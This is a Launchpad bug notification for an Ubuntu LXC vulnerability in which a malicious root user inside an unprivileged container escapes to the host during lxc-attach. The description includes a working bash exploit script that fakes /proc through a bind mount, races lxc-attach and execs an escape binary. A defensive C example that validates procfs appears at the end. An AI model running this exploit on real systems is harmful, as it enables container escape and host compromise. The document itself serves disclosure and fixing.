This bug is missing log files that will aid in diagnosing the problem.
From a terminal window please run:

apport-collect 1639345

and then change the status of the bug to 'Confirmed'.

If, due to the nature of the issue you have encountered, you are unable
to run this command, please add a comment stating that fact and change
the bug status to 'Confirmed'.

This change has been made by an automated script, maintained by the
Ubuntu Kernel Team.

** Changed in: linux (Ubuntu)
       Status: New => Incomplete

--
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to lxc in Ubuntu.
https://bugs.launchpad.net/bugs/1639345

Title:
  lxc-attach to malicious container allows access to host

Status in linux package in Ubuntu:
  Incomplete
Status in lxc package in Ubuntu:
  Fix Released
Status in linux source package in Trusty:
  Fix Committed
Status in lxc source package in Trusty:
  Fix Released
Status in linux source package in Vivid:
  Fix Committed
Status in lxc source package in Vivid:
  Fix Released
Status in linux source package in Xenial:
  Fix Committed
Status in lxc source package in Xenial:
  Fix Released
Status in linux source package in Yakkety:
  Fix Committed
Status in lxc source package in Yakkety:
  Fix Released

Bug description:
  A malicious root user in an unprivileged container may interfere with
  lxc-attach to provide manipulated guest proc file system information
  to disable dropping of capabilities and may in the end access the host
  file system by winning a very easy race against lxc-attach.
  In guest sequence:

  cat <<EOF > /tmp/test
  #!/bin/bash -e
  rm -rf /test || true
  mkdir -p /test/sys/kernel
  echo "proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0" > /test/mounts
  echo 0 > /test/sys/kernel/cap_last_cap
  mkdir -p /test/self
  mknod /test/self/status p
  cd /proc
  mount -o bind /test /proc
  while true; do
    pid=\$(ls -al */exe | grep lxc-attach | sed -r -e 's/.* ([0-9]+)\\/exe ->.*/\\1/')
    if [ "\${pid}" != "" ]; then
      cd /
      umount -i -f -l -n /proc
      exec /LxcAttachEscape "\${pid}" /bin/bash
    fi
    sleep 1
  done
  EOF

  See attachment for LxcAttachEscape.c

  Exploit uses fixed fd=7 for attacking; in other test environments it
  might be another fd. Tests were performed by attacking lxc-attach
  started by

  screen lxc-attach -n [guestname]

  which is the sequence required against the TTY-stealing attacks also
  not fixed in all lxc-attach versions.

  In my opinion two bugs might need fixing:

  * lxc-attach should not use untrusted/manipulated information for proceeding
  * kernel should prevent against ptracing of lxc-attach as it was created in another USERNS

  # lsb_release -r -d
  Description:    Ubuntu 16.04.1 LTS
  Release:        16.04

  # apt-cache policy lxc1
  lxc1:
    Installed: 2.0.5-0ubuntu1~ubuntu16.04.2
    Candidate: 2.0.5-0ubuntu1~ubuntu16.04.2
    Version table:
   *** 2.0.5-0ubuntu1~ubuntu16.04.2 500
          500 http://debarchive-ehealth.d03.arc.local/ubuntu xenial-updates/main amd64 Packages
          100 /var/lib/dpkg/status
       2.0.0-0ubuntu2 500
          500 http://debarchive-ehealth.d03.arc.local/ubuntu xenial/main amd64 Packages

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1639345/+subscriptions

--
Mailing list: https://launchpad.net/~touch-packages
Post to     : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp
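
The report's first suggested fix, that lxc-attach should not act on manipulated proc information, can be illustrated by checking the filesystem type before trusting a value such as cap_last_cap. This is an added example, not code from the bug report or from LXC; the names read_proc_long and on_procfs are hypothetical, and it assumes Linux with glibc.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/vfs.h>
#include <unistd.h>

#define PROC_SUPER_MAGIC 0x9fa0 /* procfs magic, as in <linux/magic.h> */

/* Returns 1 only if fd refers to an object on a real procfs mount. */
static int on_procfs(int fd)
{
    struct statfs sfs;
    return fstatfs(fd, &sfs) == 0 && sfs.f_type == PROC_SUPER_MAGIC;
}

/* Hypothetical helper: read a non-negative integer (e.g. cap_last_cap)
 * from below `root`; -1 if root or the file is not backed by procfs. */
long read_proc_long(const char *root, const char *rel)
{
    char buf[32], *end;
    long val = -1;
    ssize_t n;
    int fd, dfd = open(root, O_RDONLY | O_DIRECTORY | O_CLOEXEC);

    if (dfd < 0)
        return -1;
    /* Resolve below the pinned directory fd; O_NONBLOCK so a planted
     * FIFO cannot stall the open. Re-check the file's own filesystem. */
    fd = on_procfs(dfd)
        ? openat(dfd, rel, O_RDONLY | O_NOFOLLOW | O_NONBLOCK | O_CLOEXEC) : -1;
    if (fd >= 0 && on_procfs(fd) && (n = read(fd, buf, sizeof(buf) - 1)) > 0) {
        buf[n] = '\0';
        val = strtol(buf, &end, 10);
        if (end == buf || val < 0)
            val = -1;
    }
    if (fd >= 0)
        close(fd);
    close(dfd);
    return val;
}

int main(void)
{
    printf("/proc: %ld\n", read_proc_long("/proc", "sys/kernel/cap_last_cap"));
    printf("/:     %ld\n", read_proc_long("/", "sys/kernel/cap_last_cap"));
    return 0;
}
```

A directory of regular files bind-mounted over /proc, like the /test tree in the report, reports the backing filesystem's type rather than procfs and is rejected before any value is read.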